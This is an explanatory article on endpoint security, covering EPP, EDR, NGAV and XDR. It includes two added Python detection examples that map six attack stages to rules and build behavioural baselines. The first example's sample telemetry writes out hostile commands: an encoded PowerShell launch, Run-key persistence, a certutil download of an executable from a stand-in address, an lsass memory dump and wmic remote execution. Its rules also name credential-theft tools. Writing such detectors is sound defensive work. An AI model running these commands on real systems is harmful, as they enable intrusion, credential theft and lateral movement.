What is Endpoint Security? 

Endpoint security is the practice of protecting, in real time, any device that accesses an enterprise network. Any single device, if left unprotected, can become a weak link capable of compromising the entire network, which is why endpoint security is so critical to an overall cybersecurity program.

According to Gartner, endpoint protection platforms (EPPs) provide the capability to deploy agents or sensors that secure managed endpoints, including desktops, laptops, servers, and mobile devices.

What is an Endpoint? 

An endpoint is a device or server that connects to a network. In addition to those mentioned above – desktop PCs, laptop PCs, servers, mobile devices – endpoints can include phones, internet of things (IoT) devices like kitchen appliances or thermostats, cameras, and anything else that can connect to a network and take part in sharing or transmitting data.

We usually don't think of all these devices, especially the ones we use in our personal lives, as potentially insecure, but somewhere, someone is responsible for securing each device and the other networks it accesses. Complicating matters further, using electronic devices for work can spill over into personal life.

For example, if you have work apps like Slack or Google Workspace on your personal phone, your corporate administrators may require you to install certain identity and access management (IAM) applications, such as Okta or Duo, to protect those specific work applications that connect to the corporate network.

What is an Endpoint Protection Platform (EPP)? 

An EPP is a platform that facilitates deploying monitoring agents to counter malware and other types of attacks on every endpoint in an organization's network. EPPs are generally very good at doing what they say: protecting an endpoint. However, further solutions are needed to take a broader stance on network-wide protection.

What is Endpoint Detection and Response (EDR)? 

EDR solutions provide the visibility and insight needed to close security gaps by identifying and reporting risk in real time, testing defenses, and – most importantly – detecting endpoint compromise. An EDR solution should be able to proactively identify and prioritize weaknesses across the network and its users.

EPP vs. EDR 

The fundamental difference between EPP and EDR platforms and solutions is prevention versus detection of an intrusion or attack. An EPP uses agents to help prevent malicious files from executing on the endpoint, through technologies such as next-generation antivirus (NGAV). EDR, by contrast, focuses on detecting and responding to the activity that prevention missed.

Modern EDR solutions will usually incorporate extended detection and response (XDR) capabilities to go beyond simple detection and response (D&R), providing single-pane-of-glass coverage by combining endpoint telemetry with broader data collection from the rest of the environment. This can dramatically improve an organization's ability to detect an incident early in the attack chain and shut the attack down before any, or only minimal, damage is done.

How Does Endpoint Security Work? 

Endpoint security works by having the EPP continuously monitor for suspicious activity and alert network administrators to possible breaches. Sensors or agents installed on each endpoint securely stream data from that endpoint to the centralized EPP so that network traffic analysis can take place and – if necessary – mitigating actions can be taken. Let's look at the various types of attacks endpoint data can reveal, each of which points to an appropriate response:

  • Malware installation: Malware is installed differently than normal software. 
  • Malware persistence: There are only a finite number of ways that malware can persist on a system. 
  • Attacker issues commands: Attackers tend to use the operating system's shell to interact with the target system. 
  • Attacker steals credentials: Prior to lateral movement, an attacker will need credentials. 
  • Attacker downloads additional tools: Attackers typically bring a toolkit with them. 
  • Attacker moves laterally to another asset: Attackers tend to hop to other assets on the network, hoping to gather more data on the way to the final target asset. 
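The six stages above are exactly what endpoint telemetry is meant to expose. The following is an added example, not Rapid7's code or any product's detection logic: a small rule set, one rule per stage, run over constructed process-start events of the kind an agent might stream to the central platform. The JSON event shape, field names (`host`, `parent`, `image`, `cmdline`) and rule patterns are assumptions chosen for illustration; real agents emit far richer telemetry and real rules are tuned against it.

```python
"""Rule-based detection over constructed endpoint process telemetry.

Added example, not Rapid7's code or any product's logic. Each rule maps to
one of the six attack stages listed above. The JSON event shape, the field
names and the rule patterns are assumptions chosen for illustration.
"""
import json
import re
from collections import defaultdict

# Constructed sample telemetry: one process-start event per line, as an
# endpoint agent might stream it to the central platform.
SAMPLE_EVENTS = r"""
{"host":"ws01","user":"alice","parent":"winword.exe","image":"powershell.exe","cmdline":"powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"host":"ws01","user":"alice","parent":"powershell.exe","image":"reg.exe","cmdline":"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d C:\\Users\\alice\\AppData\\Roaming\\upd.exe"}
{"host":"ws01","user":"alice","parent":"powershell.exe","image":"certutil.exe","cmdline":"certutil -urlcache -split -f http://203.0.113.10/m.exe C:\\Windows\\Temp\\m.exe"}
{"host":"ws01","user":"alice","parent":"cmd.exe","image":"procdump.exe","cmdline":"procdump -ma lsass.exe lsass.dmp"}
{"host":"ws01","user":"alice","parent":"cmd.exe","image":"wmic.exe","cmdline":"wmic /node:srv02 process call create cmd.exe"}
{"host":"ws02","user":"bob","parent":"explorer.exe","image":"outlook.exe","cmdline":"outlook.exe"}
"""

OFFICE_OR_BROWSER = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def _cmd(pattern):
    """Build a predicate that searches the command line, case-insensitively."""
    rx = re.compile(pattern, re.I)
    return lambda e: rx.search(e["cmdline"]) is not None


# (stage, predicate), in the same order as the list above.
RULES = [
    # Malware installation: a document viewer or browser spawning a scripting
    # host is not how legitimate software gets installed.
    ("malware_installation",
     lambda e: e["parent"] in OFFICE_OR_BROWSER and e["image"] in SHELLS),
    # Malware persistence: the handful of autostart mechanisms are easy to enumerate.
    ("malware_persistence",
     _cmd(r"\\CurrentVersion\\Run\b|schtasks(\.exe)?\s+/create|crontab\s+-")),
    # Attacker issues commands: encoded PowerShell or host-discovery commands from a shell.
    ("attacker_commands",
     lambda e: e["image"] in SHELLS
     and re.search(r"\s-(e|ec|enc|encodedcommand)\s|whoami|net\s+user|ipconfig|systeminfo",
                   e["cmdline"], re.I) is not None),
    # Attacker steals credentials: anything reaching into LSASS memory.
    ("credential_theft", _cmd(r"lsass|mimikatz|sekurlsa|comsvcs.*MiniDump")),
    # Attacker downloads additional tools: living-off-the-land downloaders.
    ("tool_download",
     _cmd(r"certutil.*-urlcache|bitsadmin.*/transfer|(curl|wget|Invoke-WebRequest|iwr)\s.*https?://")),
    # Attacker moves laterally: remote execution aimed at another host.
    ("lateral_movement",
     _cmd(r"wmic(\.exe)?\s+/node:|psexec|winrs\s+-r:|Enter-PSSession|\bssh\s+\S+@")),
]


def parse_events(text):
    """Parse newline-delimited JSON events; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(event):
    """Return the attack stages an event matches, in RULES order (possibly empty)."""
    return [stage for stage, pred in RULES if pred(event)]


def detect(text):
    """Map host -> list of (image, stages) for every event that matched a rule."""
    hits = defaultdict(list)
    for e in parse_events(text):
        stages = classify(e)
        if stages:
            hits[e["host"]].append((e["image"], stages))
    return dict(hits)


def stages_by_host(text):
    """Collapse hits to the set of stages seen per host. Several distinct stages
    on one host in a short window is what separates a breach from noise."""
    seen = defaultdict(set)
    for host, items in detect(text).items():
        for _, stages in items:
            seen[host].update(stages)
    return {host: sorted(s) for host, s in seen.items()}


if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Any single rule here will fire on benign administration now and then; the useful signal is the chain. On the constructed data, ws01 trips all six stages in sequence while ws02 trips none, which is the shape of evidence an analyst wants the dashboard to surface before deciding to isolate the host.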

Protecting network systems from future attacks means asking the post-intrusion questions internally during the investigation: 

  • How did the attacker get in? 
  • What tools did the attacker use? 
  • Where did the attacker move to? 
  • What credentials were used? 
  • What data did the attacker have access to? 
  • What data was stolen? 
  • Is the attacker still in the environment? 
  • What specific remediation steps can you take? 
  • What can you do to prevent these kinds of attacks from happening in the future? 

Monitoring, D&R actions, and investigation all take place from the EPP's central console or dashboard. If a breach of one of the types listed above did occur, security personnel can execute tasks like blocking malware, detecting vulnerabilities, remotely disabling assets and/or endpoints to contain any fallout, and much more.

Key Components to Look for in an Endpoint Security Solution 

Each business and its accompanying security organization has different needs, but the big commonality lies in the technology we all depend on to do our jobs. With that in mind, let's look at some components an endpoint security solution should not be missing. 

Endpoint Visibility 

The number and types of devices accessing corporate data and applications have grown exponentially over the past decade. This is due in large part to the pandemic, but the widespread adoption of technology has also enabled companies to hire talent from outside the immediate geographic area they call home. In this environment, it's an understatement to say endpoint visibility is critical.

Digital forensics and incident response (DFIR) tools are critical in helping security teams quickly collect and review digital forensic evidence across endpoints, as well as proactively monitor for suspicious activity. 

Scope Broadening 

With the aforementioned decentralization of the workforce, it's generally accepted that endpoint agents are no longer optional. A security program must be able to reach any endpoint at any time to respond to threats effectively. Endpoint agents should have EDR capabilities that record key system events, acquire investigative data in real time, run NGAV that can terminate threats based on behavior, prevent active threats, and mitigate and remediate on demand.

People must also broaden their capabilities. In this sense, end-user education should be a key part of a security program's investment strategy. The dollar cost of end-user security education is negligible compared to technology costs, headcount, and breach-associated costs. Security awareness training can be tailored to the organization based on the types of threats prevalent in its industry.

Next Generation Antivirus (NGAV)

NGAV goes beyond traditional antivirus to widen the view of an organization's endpoints. An NGAV solution detects malware and fileless attacks in order to prevent attacker tactics, techniques, and procedures (TTPs), as well as malicious behavior, intentional or not, by users who are, in fact, properly credentialed.

NGAV stops malicious code hiding inside processes from executing before it has been identified. By leveraging artificial intelligence (AI), machine learning (ML), and other capabilities, NGAV can learn from the past behavior of the endpoints on which it is installed, and then block a wide range of attacks across the entire endpoint ecosystem more effectively.
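"Learning from past behavior" sounds abstract, so here is the idea reduced to its simplest working form. This is an added example, not Rapid7's or any NGAV vendor's code: it records which parent-to-child process pairs each endpoint normally produces during a training window, then judges new process starts against that history, first per host and then fleet-wide. The hosts, process names, counts and the `min_support` threshold are constructed assumptions; a real product adds many more features (code signer, file reputation, command-line structure) and actual ML models on top of the same baselining idea.

```python
"""Behavioural baselining over process-lineage telemetry.

Added example, not Rapid7's or any NGAV vendor's code. It shows the
"learn from past behaviour" idea in its simplest form: count which
parent -> child process pairs each endpoint produces during a training
window, then judge new process starts against that history, per host
and fleet-wide. Hosts, process names, counts and threshold are constructed.
"""
from collections import Counter, defaultdict

# Constructed training window: (host, parent, child), one tuple per process start.
TRAINING = []
for _day in range(5):
    TRAINING += [
        ("ws01", "explorer.exe", "winword.exe"),
        ("ws01", "explorer.exe", "chrome.exe"),
        ("ws01", "winword.exe", "splwow64.exe"),
        ("ws02", "explorer.exe", "winword.exe"),
        ("ws02", "explorer.exe", "outlook.exe"),
        ("ws02", "outlook.exe", "winword.exe"),
    ]
TRAINING.append(("ws02", "explorer.exe", "7zfm.exe"))  # observed exactly once

# Constructed events arriving after the training window.
NEW_EVENTS = [
    ("ws01", "explorer.exe", "chrome.exe"),     # routine on this host
    ("ws01", "explorer.exe", "outlook.exe"),    # new for ws01, common fleet-wide
    ("ws01", "explorer.exe", "7zfm.exe"),       # seen once, anywhere
    ("ws01", "winword.exe", "powershell.exe"),  # never observed: Word spawning a shell
]


class LineageBaseline:
    """Counts parent -> child pairs per host and across the whole fleet."""

    def __init__(self, min_support=3):
        self.min_support = min_support        # observations needed to call a pair "known"
        self.per_host = defaultdict(Counter)  # host -> Counter[(parent, child)]
        self.fleet = Counter()                # (parent, child) -> count over all hosts

    def train(self, events):
        for host, parent, child in events:
            self.per_host[host][(parent, child)] += 1
            self.fleet[(parent, child)] += 1

    def verdict(self, host, parent, child):
        """Rank a process start from most to least familiar."""
        pair = (parent, child)
        if self.per_host[host][pair] >= self.min_support:
            return "known_host"
        if self.fleet[pair] >= self.min_support:
            return "known_fleet"
        if self.fleet[pair] > 0:
            return "rare"
        return "never_seen"


def build_baseline():
    """Train a baseline on the constructed window."""
    baseline = LineageBaseline()
    baseline.train(TRAINING)
    return baseline


def triage(baseline, events):
    """Return (event, verdict) for every event that is not routine on its host."""
    out = []
    for host, parent, child in events:
        v = baseline.verdict(host, parent, child)
        if v != "known_host":
            out.append(((host, parent, child), v))
    return out


if __name__ == "__main__":
    for event, v in triage(build_baseline(), NEW_EVENTS):
        print(f"{v:11s} {event}")
```

The fleet-wide fallback matters in practice: a pair that is new on one laptop but routine on hundreds of others is usually a new user habit, not an attack, and treating it as an alert is how behavioral products drown analysts. The `never_seen` verdict on a Word-to-PowerShell start is where a blocking decision (rather than just an alert) is defensible, because that lineage has no benign history on any host.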

Why is Endpoint Security Important? 

Endpoint security is important because it helps pinpoint and reduce risk across the entire organization. Real-time threat detection, monitoring of remote and virtual infrastructure, and rapid agent deployment are just some of the benefits endpoint security can bring.

Endpoint security strategy is also changing, reaching beyond the endpoint, as discussed above, to become a key part of a larger XDR program. This matters if security organizations wish to become more proactive, detecting the signals of a potential impending attack and shutting it down before any damage is done.

Every employee interacts with multiple endpoints every day, including personal devices used for work purposes, hopping on and off the corporate network. A robust monitoring and D&R program helps protect the ecosystem of assets from increasingly sophisticated breaches, lateral movement, and data theft.

Read More on Endpoint Security 

Endpoint Security: Latest Rapid7 Blog Posts 

Use Case: Unify Endpoint Assessment